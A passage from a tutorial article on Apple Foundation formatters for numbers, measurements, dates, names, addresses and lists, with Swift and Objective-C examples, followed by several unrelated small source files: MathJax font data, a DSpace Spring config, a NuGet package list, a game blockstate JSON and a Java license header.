formatter.string(from: 1234567) // 1234570
formatter.string(from: 1234.567) // 1234.57
formatter.string(from: 100.234567) // 100.235
formatter.string(from: 1.23000) // 1.23
formatter.string(from: 0.0000123) // 0.0000123
```
- Set `usesSignificantDigits` to `false`
_(or keep as-is, since that's the default)_
to format according to specific limits on
how many <dfn>decimal</dfn> and <dfn>fraction</dfn> digits to show
(the number of digits leading or trailing the decimal point, respectively).
```swift
var formatter = NumberFormatter()
formatter.usesSignificantDigits = false
formatter.minimumIntegerDigits = 0 // default
formatter.maximumIntegerDigits = 42 // default (seriously)
formatter.minimumFractionDigits = 0 // default
formatter.maximumFractionDigits = 0 // default
formatter.string(from: 1234567) // 1234567
formatter.string(from: 1234.567) // 1235
formatter.string(from: 100.234567) // 100
formatter.string(from: 1.23000) // 1
formatter.string(from: 0.0000123) // 0
```
If you need specific rounding behavior,
such as "round to the nearest integer" or "round towards zero",
check out the
`roundingMode`,
`roundingIncrement`, and
`roundingBehavior` properties.
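For instance, here's a minimal sketch of `roundingMode` at work,
assuming the default `none` number style (which shows no fraction digits):
```swift
let formatter = NumberFormatter()
formatter.roundingMode = .halfUp
formatter.string(from: 2.5) // "3"
formatter.roundingMode = .down
formatter.string(from: 2.5) // "2"
```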
#### Locale Awareness
Nearly everything about the formatter can be customized,
including the
grouping separator,
decimal separator,
negative symbol,
percent symbol,
infinity symbol,
and
how to represent zero values.
Although these settings can be overridden on an individual basis,
it's typically best to defer to the defaults provided by the user's locale.
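To see why deferring to the locale pays off,
here's the same value formatted for two different locales,
with the grouping and decimal separators swapping automatically:
```swift
let formatter = NumberFormatter()
formatter.numberStyle = .decimal
formatter.locale = Locale(identifier: "en_US")
formatter.string(from: 1234.56) // "1,234.56"
formatter.locale = Locale(identifier: "de_DE")
formatter.string(from: 1234.56) // "1.234,56"
```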
{% error %}
The advice to defer to user locale defaults has a critical exception:
**money**
Consider the following code
that uses the default `NumberFormatter` settings for
American and Japanese locales
to format the same number:
```swift
let number = 1234.5678 // 🤔
let formatter = NumberFormatter()
formatter.numberStyle = .currency
let 🇺🇸 = Locale(identifier: "en_US")
formatter.locale = 🇺🇸
formatter.string(for: number) // $1,234.57
let 🇯🇵 = Locale(identifier: "ja_JP")
formatter.locale = 🇯🇵
formatter.string(for: number) // ¥ 1,235 😵
```
```objc
NSNumberFormatter *numberFormatter = [[NSNumberFormatter alloc] init];
[numberFormatter setNumberStyle:NSNumberFormatterCurrencyStyle];
for (NSString *identifier in @[@"en_US", @"ja_JP"]) {
numberFormatter.locale = [NSLocale localeWithLocaleIdentifier:identifier];
NSLog(@"%@: %@", identifier, [numberFormatter stringFromNumber:@(1234.5678)]);
}
// Prints "$1,234.57" and "¥ 1,235" 😵
```
At the time of writing,
the difference between \$1,234.57 and ¥ 1,235
is roughly equivalent to the price difference between
a new [MacBook Air](https://www.apple.com/shop/buy-mac/macbook-air)
and
a [Lightning - 3.5 mm Adapter](https://www.apple.com/jp/shop/product/MMX62J/A/lightning-35-mmヘッドフォンジャックアダプタ).
Make a mistake like that in your app,
and someone --- developer or user ---
is going to be pretty upset.
Working with money in code is a deep topic,
but the basic guidance is this:
Use `Decimal` values (rather than `Float` or `Double`)
and specify an explicit currency.
For more information,
check out the
[Flight School Guide to Swift Numbers](https://flight.school/books/numbers/)
and its companion Swift library,
[`Money`](https://github.com/flight-school/money).
{% enderror %}
### MeasurementFormatter
`MeasurementFormatter` was introduced in iOS 10 and macOS 10.12
as part of the full complement of APIs for performing
type-safe dimensional calculations:
- `Unit` subclasses represent units of measure,
such as count and ratio
- `Dimension` subclasses represent dimensional units of measure,
such as mass and length,
(which is the case for the overwhelming majority of
the concrete subclasses provided,
on account of them being dimensional in nature)
- A `Measurement` is a quantity of a particular `Unit`
- A `UnitConverter` converts quantities of one unit to
a different, compatible unit
<details>
{::nomarkdown}
<summary>For the curious, here's the complete list of units supported by <code>MeasurementFormatter</code>:</summary>
{:/}
<figure>
| Measure | Unit Subclass | Base Unit |
| ----------------------------- | --------------------------------- | ----------------------------------- |
| Acceleration | `UnitAcceleration` | meters per second squared (m/s²) |
| Planar angle and rotation | `UnitAngle` | degrees (°) |
| Area | `UnitArea` | square meters (m²) |
| Concentration of mass | `UnitConcentrationMass` | milligrams per deciliter (mg/dL) |
| Dispersion | `UnitDispersion` | parts per million (ppm) |
| Duration | `UnitDuration` | seconds (sec) |
| Electric charge | `UnitElectricCharge` | coulombs (C) |
| Electric current | `UnitElectricCurrent` | amperes (A) |
| Electric potential difference | `UnitElectricPotentialDifference` | volts (V) |
| Electric resistance | `UnitElectricResistance` | ohms (Ω) |
| Energy | `UnitEnergy` | joules (J) |
| Frequency | `UnitFrequency` | hertz (Hz) |
| Fuel consumption | `UnitFuelEfficiency` | liters per 100 kilometers (L/100km) |
| Illuminance | `UnitIlluminance` | lux (lx) |
| Information Storage | `UnitInformationStorage` | Byte<sup>\*</sup> (byte) |
| Length | `UnitLength` | meters (m) |
| Mass | `UnitMass` | kilograms (kg) |
| Power | `UnitPower` | watts (W) |
| Pressure | `UnitPressure` | newtons per square meter (N/m²) |
| Speed | `UnitSpeed` | meters per second (m/s) |
| Temperature | `UnitTemperature` | kelvin (K) |
| Volume | `UnitVolume` | liters (L) |
<figcaption>
<p>Follows [ISO/IEC 80000-13 standard](https://en.wikipedia.org/wiki/ISO/IEC_80000);
one byte is 8 bits, 1 kilobyte = 1000¹ bytes</p>
</figcaption>
</figure>
</details>
---
`MeasurementFormatter` and its associated APIs are intuitive ---
just a delight to work with, honestly.
The only potential snag for newcomers to Swift
(or Objective-C old-timers, perhaps)
are the use of generics to constrain `Measurement` values
to a particular `Unit` type.
```swift
import Foundation
// "The swift (Apus apus) can power itself to a speed of 111.6km/h"
let speed = Measurement<UnitSpeed>(value: 111.6,
unit: .kilometersPerHour)
let formatter = MeasurementFormatter()
formatter.string(from: speed) // 69.345 mph
```
#### Configuring the Underlying Number Formatter
By delegating much of its formatting responsibility to
an underlying `NumberFormatter` property,
`MeasurementFormatter` maintains a high degree of configurability
while keeping a small API footprint.
Readers with an engineering background may have noticed that
the localized speed in the previous example
gained an extra significant figure along the way.
As discussed previously,
we can enable `usesSignificantDigits` and set `maximumSignificantDigits`
to prevent incidental changes in precision.
```swift
formatter.numberFormatter.usesSignificantDigits = true
formatter.numberFormatter.maximumSignificantDigits = 4
formatter.string(from: speed) // 69.35 mph
```
#### Changing Which Unit is Displayed
A `MeasurementFormatter`,
by default,
will use the preferred unit for the user's current locale (if one exists)
instead of the one provided by a `Measurement` value.
Readers with a non-American background certainly noticed that
the localized speed in the original example
converted to a bizarre, archaic unit of measure known as "miles per hour".
You can override this default unit localization behavior
by passing the `providedUnit` option.
```swift
formatter.unitOptions = [.providedUnit]
formatter.string(from: speed) // 111.6 km/h
formatter.string(from: speed.converted(to: .milesPerHour)) // 69.35 mph
```
---
## Formatting Dates, Times, and Durations
| Class | Example Output | Availability |
| --------------------------- | ----------------- | ---------------------------- |
| `DateFormatter` | "July 15, 2019" | iOS 2.0 <br/> macOS 10.0+ |
| `ISO8601DateFormatter` | "2019-07-15" | iOS 10.0+ <br/> macOS 10.12+ |
| `DateComponentsFormatter` | "10 minutes" | iOS 8.0 <br/> macOS 10.10+ |
| `DateIntervalFormatter` | "6/3/19 - 6/7/19" | iOS 8.0 <br/> macOS 10.10+ |
| `RelativeDateTimeFormatter` | "3 weeks ago" | iOS 13.0+ <br/> macOS 10.15 |
### DateFormatter
`DateFormatter` is the <abbr title=" Original Gangster">OG</abbr> class
for representing dates and times.
And it remains your best, first choice
for the majority of date formatting tasks.
For a while,
there was a concern that it would become overburdened with responsibilities
like its sibling `NumberFormatter`.
But fortunately,
recent SDK releases spawned new formatters for new functionality.
We'll talk about those in a little bit.
#### Date and Time Styles
The most important properties for a `DateFormatter` object are its
`dateStyle` and `timeStyle`.
As with `NumberFormatter` and its `numberStyle`,
these date and time styles provide preset configurations
for common formats.
<table>
<thead>
<tr>
<th>Style</th>
<th>Date</th>
<th>Time</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>none</code></td>
<td>“”</td>
<td>“”</td>
</tr>
<tr>
<td><code>short</code></td>
<td>“11/16/37”</td>
<td>“3:30 PM”</td>
</tr>
<tr>
<td><code>medium</code></td>
<td>“Nov 16, 1937”</td>
<td>“3:30:32 PM”</td>
</tr>
<tr>
<td><code>long</code></td>
<td>“November 16, 1937”</td>
<td>“3:30:32 PM”</td>
</tr>
<tr>
<td><code>full</code></td>
<td>“Tuesday, November 16, 1937 AD”</td>
<td>“3:30:42 PM EST”</td>
</tr>
</tbody>
</table>
```swift
let date = Date()
let formatter = DateFormatter()
formatter.dateStyle = .long
formatter.timeStyle = .long
formatter.string(from: date)
// July 15, 2019 at 9:41:00 AM PST
formatter.dateStyle = .short
formatter.timeStyle = .short
formatter.string(from: date)
// "7/16/19, 9:41:00 AM"
```
```objc
NSDateFormatter *formatter = [[NSDateFormatter alloc] init];
[formatter setDateStyle:NSDateFormatterLongStyle];
[formatter setTimeStyle:NSDateFormatterLongStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// July 15, 2019 at 9:41:00 AM PST
[formatter setDateStyle:NSDateFormatterShortStyle];
[formatter setTimeStyle:NSDateFormatterShortStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// 7/16/19, 9:41:00 AM
```
`dateStyle` and `timeStyle` are set independently.
So,
to display just the time for a particular date,
for example,
you set `dateStyle` to `none`:
```swift
let formatter = DateFormatter()
formatter.dateStyle = .none
formatter.timeStyle = .medium
let string = formatter.string(from: Date())
// 9:41:00 AM
```
```objc
NSDateFormatter *formatter = [[NSDateFormatter alloc] init];
[formatter setDateStyle:NSDateFormatterNoStyle];
[formatter setTimeStyle:NSDateFormatterMediumStyle];
NSLog(@"%@", [formatter stringFromDate:[NSDate date]]);
// 9:41:00 AM
```
As you might expect,
each aspect of the date format can alternatively be configured individually, a la carte.
For any aspiring time wizards,
`DateFormatter` has a bevy of different knobs and switches to play with.
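For example, rather than dictating an exact format,
you can hand the formatter a template of the components you care about
and let it work out a locale-appropriate arrangement
(a small sketch; the output assumes an `en_US` locale):
```swift
let formatter = DateFormatter()
formatter.locale = Locale(identifier: "en_US")
formatter.setLocalizedDateFormatFromTemplate("yMMMMd")
formatter.string(from: Date()) // "July 15, 2019"
```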
{% warning %}
`DateFormatter` also has a `dateFormat` property
that takes a familiar `STRFTIME(3)`-style format string.
We've already called this out for `NumberFormatter`,
but it's a point that bears repeating:
use presets wherever possible and
only use custom format strings if absolutely necessary.
{% endwarning %}
### ISO8601DateFormatter
When we wrote our first article about `NSFormatter` back in 2013,
we made a point to include discussion of
[Peter Hosey's ISO8601DateFormatter](https://github.com/boredzo/iso-8601-date-formatter)'s
as the essential open-source library
for parsing timestamps from external data sources.
Fortunately,
we no longer need to proffer a third-party solution,
because, as of iOS 10.0 and macOS 10.12,
`ISO8601DateFormatter` is now built-in to Foundation.
```swift
let formatter = ISO8601DateFormatter()
formatter.date(from: "2019-07-15T09:41:00-07:00")
// Jul 15, 2019 at 9:41 AM
```
{% info %}
`JSONDecoder` provides built-in support for decoding ISO8601-formatted timestamps
by way of the `.iso8601` date decoding strategy.
```swift
import Foundation
let json = #"""
[{
"body": "Hello, world!",
"timestamp": "2019-07-15T09:41:00-07:00"
}]
"""#.data(using: .utf8)!
struct Comment: Decodable {
let body: String
let timestamp: Date
}
let decoder = JSONDecoder()
decoder.dateDecodingStrategy = .iso8601
let comments = try decoder.decode([Comment].self, from: json)
comments.first?.timestamp
// Jul 15, 2019 at 9:41 AM
```
{% endinfo %}
### DateIntervalFormatter
`DateIntervalFormatter` is like `DateFormatter`,
but can handle two dates at once ---
specifically, a start and end date.
```swift
let formatter = DateIntervalFormatter()
formatter.dateStyle = .short
formatter.timeStyle = .none
let fromDate = Date()
let toDate = Calendar.current.date(byAdding: .day, value: 7, to: fromDate)!
formatter.string(from: fromDate, to: toDate)
// "7/15/19 – 7/22/19"
```
```objc
NSDateIntervalFormatter *formatter = [[NSDateIntervalFormatter alloc] init];
formatter.dateStyle = NSDateIntervalFormatterShortStyle;
formatter.timeStyle = NSDateIntervalFormatterNoStyle;
NSDate *fromDate = [NSDate date];
NSDate *toDate = [fromDate dateByAddingTimeInterval:86400 * 7];
NSLog(@"%@", [formatter stringFromDate:fromDate toDate:toDate]);
// "7/15/19 – 7/22/19"
```
#### Date Interval Styles
<table>
<thead>
<tr>
<th>Style</th>
<th>Date</th>
<th>Time</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>none</code></td>
<td>“”</td>
<td>“”</td>
</tr>
<tr>
<td><code>short</code></td>
<td>“6/30/14 - 7/11/14”</td>
<td>“5:51 AM - 7:37 PM”</td>
</tr>
<tr>
<td><code>medium</code></td>
<td>“Jun 30, 2014 - Jul 11, 2014”</td>
<td>“5:51:49 AM - 7:38:29 PM”</td>
</tr>
<tr>
<td><code>long</code></td>
<td>“June 30, 2014 - July 11, 2014”</td>
<td>“6:02:54 AM GMT-8 - 7:49:34 PM GMT-8”</td>
</tr>
<tr>
<td><code>full</code></td>
<td>“Monday, June 30, 2014 - Friday, July 11, 2014”</td>
<td>“6:03:28 PM Pacific Standard Time - 7:50:08 PM Pacific Standard Time”</td>
</tr>
</tbody>
</table>
{% info %}
When displaying business hours,
such as "Mon – Fri: 8:00 AM – 10:00 PM",
use the `shortWeekdaySymbols` of the current `Calendar`
to get localized names for the days of the week.
```swift
import Foundation
var calendar = Calendar.current
calendar.locale = Locale(identifier: "en_US")
calendar.shortWeekdaySymbols
// ["Sun", "Mon", "Tue", "Wed", "Thu", "Fri", "Sat"]
calendar.locale = Locale(identifier: "ja_JP")
calendar.shortWeekdaySymbols
// ["日", "月", "火", "水", "木", "金", "土"]
```
{% endinfo %}
### DateComponentsFormatter
As the name implies,
`DateComponentsFormatter` works with `DateComponents` values
([previously](/datecomponents/)),
which contain a combination of discrete calendar quantities,
such as "1 day and 2 hours".
`DateComponentsFormatter` provides localized representations of date components
in several different, pre-set formats:
```swift
let formatter = DateComponentsFormatter()
formatter.unitsStyle = .full
let components = DateComponents(day: 1, hour: 2)
let string = formatter.string(from: components)
// 1 day, 2 hours
```
```objc
NSDateComponentsFormatter *formatter = [[NSDateComponentsFormatter alloc] init];
formatter.unitsStyle = NSDateComponentsFormatterUnitsStyleFull;
NSDateComponents *components = [[NSDateComponents alloc] init];
components.day = 1;
components.hour = 2;
NSLog(@"%@", [formatter stringFromDateComponents:components]);
// 1 day, 2 hours
```
#### Date Components Unit Styles
| Style | Example |
| ------------- | ----------------------- |
| `positional` | "1:10" |
| `abbreviated` | "1h 10m" |
| `short` | "1hr 10min" |
| `full` | "1 hour, 10 minutes" |
| `spellOut` | "One hour, ten minutes" |
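For instance, here's how the same pair of components reads
under a couple of different unit styles:
```swift
let formatter = DateComponentsFormatter()
let components = DateComponents(hour: 1, minute: 10)
formatter.unitsStyle = .positional
formatter.string(from: components) // "1:10"
formatter.unitsStyle = .full
formatter.string(from: components) // "1 hour, 10 minutes"
```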
#### Formatting Context
Some years ago,
formatters introduced the concept of <dfn>formatting context</dfn>,
to handle situations where
the capitalization and punctuation of a localized string may depend on whether
it appears at the beginning or middle of a sentence.
A `context` property is available for `DateComponentsFormatter`,
as well as `DateFormatter`, `NumberFormatter`, and others.
<figure>
| Formatting Context | Output |
| --------------------- | -------------------- |
| `standalone` | "About 2 hours" |
| `listItem` | "About 2 hours" |
| `beginningOfSentence` | "About 2 hours" |
| `middleOfSentence` | "about 2 hours" |
| `dynamic` | Depends<sup>\*</sup> |
<figcaption>
<p><sup>\*</sup>
A `Dynamic` context changes capitalization automatically
depending on where it appears in the text
for locales that may position strings differently
depending on the content.</p>
</figcaption>
</figure>
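Here's a hedged sketch of formatting context in action,
using the `formattingContext` property on `DateFormatter`
together with relative date formatting
(the exact capitalization behavior depends on the locale):
```swift
let formatter = DateFormatter()
formatter.locale = Locale(identifier: "en_US")
formatter.dateStyle = .medium
formatter.timeStyle = .none
formatter.doesRelativeDateFormatting = true
formatter.formattingContext = .middleOfSentence
formatter.string(from: Date()) // "today"
formatter.formattingContext = .beginningOfSentence
formatter.string(from: Date()) // "Today"
```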
### RelativeDateTimeFormatter
`RelativeDateTimeFormatter` is a newcomer in iOS 13 ---
and at the time of writing, still undocumented,
so consider this an NSHipster exclusive scoop!
Longtime readers may recall that
`DateFormatter` actually gave this a try circa iOS 4
by way of the `doesRelativeDateFormatting` property.
But that hardly ever worked,
and most of us forgot about it, probably.
Fortunately,
`RelativeDateTimeFormatter` succeeds
where `doesRelativeDateFormatting` fell short,
and offers some great new functionality to make your app
more personable and accessible.
(As far as we can tell,)
`RelativeDateTimeFormatter` takes the most significant date component
and displays it in terms of past or future tense
("1 day ago" / "in 1 day").
```swift
let formatter = RelativeDateTimeFormatter()
formatter.localizedString(from: DateComponents(day: 1, hour: 1)) // "in 1 day"
formatter.localizedString(from: DateComponents(day: -1)) // "1 day ago"
formatter.localizedString(from: DateComponents(hour: 3)) // "in 3 hours"
formatter.localizedString(from: DateComponents(minute: 60)) // "in 60 minutes"
```
For the most part,
this seems to work really well.
However, its handling of `nil`, zero, and net-zero values
leaves something to be desired...
```swift
formatter.localizedString(from: DateComponents(hour: 0)) // "in 0 hours"
formatter.localizedString(from: DateComponents(day: 1, hour: -24)) // "in 1 day"
formatter.localizedString(from: DateComponents()) // ""
```
#### Styles
<figure>
| Style | Example |
| ------------- | ------------------------- |
| `abbreviated` | "1 mo. ago" <sup>\*</sup> |
| `short` | "1 mo. ago" |
| `full` | "1 month ago" |
| `spellOut` | "one month ago" |
<figcaption>
<p><sup>\*</sup>May produce output distinct from `short` for non-English locales.</p>
</figcaption>
</figure>
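For example, switching unit styles on the same components
(outputs assume an English locale):
```swift
let formatter = RelativeDateTimeFormatter()
formatter.unitsStyle = .full
formatter.localizedString(from: DateComponents(month: -1)) // "1 month ago"
formatter.unitsStyle = .spellOut
formatter.localizedString(from: DateComponents(month: -1)) // "one month ago"
```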
#### Using Named Relative Date Times
By default,
`RelativeDateTimeFormatter` adopts the formulaic convention
we've seen so far.
But you can set the `dateTimeStyle` property to `.named`
to prefer localized <dfn>deictic expressions</dfn> ---
"tomorrow", "yesterday", "next week" ---
whenever one exists.
```swift
import Foundation
let formatter = RelativeDateTimeFormatter()
formatter.localizedString(from: DateComponents(day: -1)) // "1 day ago"
formatter.dateTimeStyle = .named
formatter.localizedString(from: DateComponents(day: -1)) // "yesterday"
```
This just goes to show that
beyond calendrical and temporal relativity,
`RelativeDateTimeFormatter` is a real whiz at linguistic relativity, too!
For example,
English doesn't have a word to describe the day before yesterday,
whereas other languages, like German, do.
```swift
formatter.localizedString(from: DateComponents(day: -2)) // "2 days ago"
formatter.locale = Locale(identifier: "de_DE")
formatter.localizedString(from: DateComponents(day: -2)) // "vorgestern"
```
<em lang="de">Hervorragend!</em>
---
## Formatting People and Places
| Class | Example Output | Availability |
| ------------------------------- | ------------------------------------------- | --------------------------- |
| `PersonNameComponentsFormatter` | "J. Appleseed" | iOS 9.0+ <br/> macOS 10.11+ |
| `CNContactFormatter` | "Appleseed, Johnny" | iOS 9.0+ <br/> macOS 10.11+ |
| `CNPostalAddressFormatter` | "1 Infinite Loop\\n<br/>Cupertino CA 95014" | iOS 9.0+ <br/> macOS 10.11+ |
{% warning %}
`CNContactFormatter`
is superseded by `PersonNameComponentsFormatter`.
Unless you're working with existing `CNContact` objects,
prefer the use of `PersonNameComponentsFormatter` to format personal names.
{% endwarning %}
### PersonNameComponentsFormatter
`PersonNameComponentsFormatter` is a sort of high water mark for Foundation.
It encapsulates one of the [hardest](https://martinfowler.com/bliki/TwoHardThings.html),
most personal problems in computer science
in such a way as to make it accessible to anyone
without requiring a degree in Ethnography.
The [documentation](https://developer.apple.com/documentation/foundation/personnamecomponentsformatter)
does a wonderful job illustrating the complexities of personal names
(if I might say so myself),
but if you had any doubt of the utility of such an API,
consider the following example:
```swift
let formatter = PersonNameComponentsFormatter()
var nameComponents = PersonNameComponents()
nameComponents.givenName = "Johnny"
nameComponents.familyName = "Appleseed"
formatter.string(from: nameComponents) // "Johnny Appleseed"
```
Simple enough, right?
We all know names are space delimited, first-last... _right?_
```swift
nameComponents.givenName = "约翰尼"
nameComponents.familyName = "苹果籽"
formatter.string(from: nameComponents) // "苹果籽约翰尼"
```
_’nuf said._
### CNPostalAddressFormatter
`CNPostalAddressFormatter` provides a convenient `Formatter`-based API
to functionality dating back to the original AddressBook framework.
The following example formats a constructed `CNMutablePostalAddress`,
but you'll most likely use existing `CNPostalAddress` values
retrieved from the user's address book.
```swift
let address = CNMutablePostalAddress()
address.street = "One Apple Park Way"
address.city = "Cupertino"
address.state = "CA"
address.postalCode = "95014"
let addressFormatter = CNPostalAddressFormatter()
addressFormatter.string(from: address)
/* "One Apple Park Way
Cupertino CA 95014" */
```
#### Styling Formatted Attributed Strings
When formatting compound values,
it can be hard to figure out where each component went
in the final, resulting string.
This can be a problem when you want to, for example,
call out certain parts in the UI.
Rather than hacking together an ad-hoc,
[regex](/swift-regular-expressions/)-based solution,
`CNPostalAddressFormatter` provides a method that vends an
`NSAttributedString` that lets you identify
the ranges of each component
(`PersonNameComponentsFormatter` does this too).
The `NSAttributedString` API is...
to put it politely,
bad.
It feels bad to use.
So for the sake of anyone hoping to take advantage of this functionality,
please copy-paste and appropriate the following code sample
to your heart's content:
```swift
var attributedString = addressFormatter.attributedString(
from: address,
withDefaultAttributes: [:]
).mutableCopy() as! NSMutableAttributedString
let stringRange = NSRange(location: 0, length: attributedString.length)
attributedString.enumerateAttributes(in: stringRange, options: []) { (attributes, attributesRange, _) in
let color: UIColor
switch attributes[NSAttributedString.Key(CNPostalAddressPropertyAttribute)] as? String {
case CNPostalAddressStreetKey:
color = .red
case CNPostalAddressCityKey:
color = .orange
case CNPostalAddressStateKey:
color = .green
case CNPostalAddressPostalCodeKey:
color = .purple
default:
return
}
attributedString.addAttribute(.foregroundColor,
value: color,
range: attributesRange)
}
```
<figure>
<address style="display: inline-block; padding: 1em; font-style: normal;">
<span style="color: red;">One Apple Park Way</span><br/>
<span style="color: orange;">Cupertino</span>
<span style="color: green;">CA</span>
<span style="color: purple;">95014</span>
</address>
</figure>
---
## Formatting Lists and Items
| Class | Example Output | Availability |
| --------------- | --------------------------------------- | ---------------------------- |
| `ListFormatter` | "macOS, iOS, iPadOS, watchOS, and tvOS" | iOS 13.0+ <br/> macOS 10.15+ |
### ListFormatter
Rounding out our survey of formatters in the Apple SDK,
it's another new addition in iOS 13:
`ListFormatter`.
To be completely honest,
we didn't know where to put this in the article,
so we just kind of stuck it on the end here.
(Though in hindsight,
this is perhaps appropriate given the subject matter).
Once again,
[we don't have any official documentation to work from at the moment](https://developer.apple.com/documentation/foundation/listformatter),
but the comments in the header file give us enough to go on.
> NSListFormatter provides locale-correct formatting of a list of items
> using the appropriate separator and conjunction.
> Note that the list formatter is unaware of
> the context where the joined string will be used,
> e.g., in the beginning of the sentence
> or used as a standalone string in the UI,
> so it will not provide any sort of capitalization customization on the given items,
> but merely join them as-is.
>
> The string joined this way may not be grammatically correct when placed in a sentence,
> and it should only be used in a standalone manner.
_tl;dr_:
This is `joined(by:)` with locale-aware serial and penultimate delimiters.
For simple lists of strings,
you don't even need to bother with instantiating `ListFormatter` ---
just call the `localizedString(byJoining:)` class method.
```swift
import Foundation
let operatingSystems = ["macOS", "iOS", "iPadOS", "watchOS", "tvOS"]
ListFormatter.localizedString(byJoining: operatingSystems)
// "macOS, iOS, iPadOS, watchOS, and tvOS"
```
`ListFormatter` works as you'd expect
for lists comprising zero, one, or two items.
```swift
ListFormatter.localizedString(byJoining: [])
// ""
ListFormatter.localizedString(byJoining: ["Apple"])
// "Apple"
ListFormatter.localizedString(byJoining: ["Jobs", "Woz"])
// "Jobs and Woz"
```
#### Lists of Formatted Values
`ListFormatter` exposes an underlying `itemFormatter` property,
which effectively adds a `map(_:)` before calling `joined(by:)`.
You use `itemFormatter` whenever you're formatting a list of non-`String` elements.
For example,
you can set a `NumberFormatter` as the `itemFormatter` for a `ListFormatter`
to turn an array of cardinals (`Int` values)
into a localized list of ordinals.
```swift
let numberFormatter = NumberFormatter()
numberFormatter.numberStyle = .ordinal
let listFormatter = ListFormatter()
listFormatter.itemFormatter = numberFormatter
listFormatter.string(from: [1, 2, 3])
// "1st, 2nd, and 3rd"
```
{% warning %}
If you set a custom locale on your list formatter,
be sure to set that locale for the underlying formatter.
And be mindful of value semantics, too ---
without the re-assignment to `itemFormatter` in the example below,
you'd get a French list of English ordinals instead.
```swift
let 🇫🇷 = Locale(identifier: "fr_FR")
listFormatter.locale = 🇫🇷
numberFormatter.locale = 🇫🇷
listFormatter.itemFormatter = numberFormatter
listFormatter.string(from: [1, 2, 3])
// "1er, 2e et 3e"
```
{% endwarning %}
---
As some of the oldest members of the Foundation framework,
`NSNumberFormatter` and `NSDateFormatter`
are astonishingly well-suited to their respective domains,
in that way only decade-old software can.
This tradition of excellence is carried by the most recent incarnations as well.
If your app deals in numbers or dates
(or time intervals or names or lists or measurements of any kind),
then `NSFormatter` is indispensable.
And if your app _doesn't_...
then the question is,
what _does_ it do, exactly?
Invest in learning all of the secrets of Foundation formatters
to get everything exactly how you want them.
And if you find yourself with formatting logic scattered across your app,
consider creating your own `Formatter` subclass
to consolidate all of that business logic in one place.
{% asset articles/formatter.css %}
| {
"pile_set_name": "Github"
} |
gcr.io/google_containers/kube-cross:v1.11.4-1
| {
"pile_set_name": "Github"
} |
/*
* /MathJax/jax/output/HTML-CSS/fonts/TeX/Typewriter/Regular/CombDiacritMarks.js
*
* Copyright (c) 2009-2014 The MathJax Consortium
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
MathJax.Hub.Insert(MathJax.OutputJax["HTML-CSS"].FONTDATA.FONTS.MathJax_Typewriter,{768:[611,-485,0,-409,-195],769:[611,-485,0,-331,-117],770:[611,-460,0,-429,-97],771:[611,-466,0,-438,-88],772:[577,-500,0,-452,-74],774:[611,-504,0,-446,-79],776:[612,-519,0,-421,-104],778:[619,-499,0,-344,-182],780:[577,-449,0,-427,-99]});MathJax.Ajax.loadComplete(MathJax.OutputJax["HTML-CSS"].fontDir+"/Typewriter/Regular/CombDiacritMarks.js");
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:context="http://www.springframework.org/schema/context"
xsi:schemaLocation="http://www.springframework.org/schema/beans
http://www.springframework.org/schema/beans/spring-beans.xsd
http://www.springframework.org/schema/context
http://www.springframework.org/schema/context/spring-context.xsd">
<context:annotation-config /> <!-- allows us to use spring annotations in beans -->
<!-- Authority control -->
<bean class="org.dspace.authority.AuthoritySolrServiceImpl" id="org.dspace.authority.AuthoritySearchService"/>
<alias name="org.dspace.authority.AuthoritySearchService" alias="org.dspace.authority.indexer.AuthorityIndexingService"/>
<bean id="dspace.DSpaceAuthorityIndexer" class="org.dspace.authority.indexer.DSpaceAuthorityIndexer"/>
<bean name="AuthorityTypes" class="org.dspace.authority.AuthorityTypes">
<property name="types">
<list>
<bean class="org.dspace.authority.PersonAuthorityValue"/>
</list>
</property>
<property name="fieldDefaults">
<map>
<entry key="dc_contributor_author">
<bean class="org.dspace.authority.PersonAuthorityValue"/>
</entry>
</map>
</property>
</bean>
</beans>
| {
"pile_set_name": "Github"
} |
<?xml version="1.0" encoding="utf-8"?>
<packages>
<package id="jQuery" version="1.6.4" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.Core" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.JS" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.AspNet.SignalR.SystemWeb" version="2.2.0" targetFramework="net451" />
<package id="Microsoft.Owin" version="2.1.0" targetFramework="net451" />
<package id="Microsoft.Owin.Host.SystemWeb" version="2.1.0" targetFramework="net451" />
<package id="Microsoft.Owin.Security" version="2.1.0" targetFramework="net451" />
<package id="Newtonsoft.Json" version="7.0.1" targetFramework="net451" />
<package id="Owin" version="1.0" targetFramework="net451" />
<package id="Serilog" version="1.5.7" targetFramework="net451" />
</packages> | {
"pile_set_name": "Github"
} |
{
"multipart": [
{
"when": {
"stage": "0"
},
"apply": [
{
"model": "tfc:plants/poppy_0"
}
]
},
{
"when": {
"stage": "1"
},
"apply": [
{
"model": "tfc:plants/poppy_1"
}
]
},
{
"when": {
"stage": "2"
},
"apply": [
{
"model": "tfc:plants/poppy_2"
}
]
},
{
"when": {
"stage": "3"
},
"apply": [
{
"model": "tfc:plants/poppy_3"
}
]
},
{
"when": {
"stage": "4"
},
"apply": [
{
"model": "tfc:plants/poppy_4"
}
]
}
]
}
| {
"pile_set_name": "Github"
} |
/**
* Copyright 2011-2019 Asakusa Framework Team.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package com.asakusafw.runtime.io.text;
